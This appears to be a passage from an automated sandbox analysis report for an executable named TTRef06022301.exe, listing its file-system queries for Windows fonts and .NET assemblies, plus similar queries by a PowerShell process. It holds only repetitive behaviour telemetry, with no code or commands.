                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
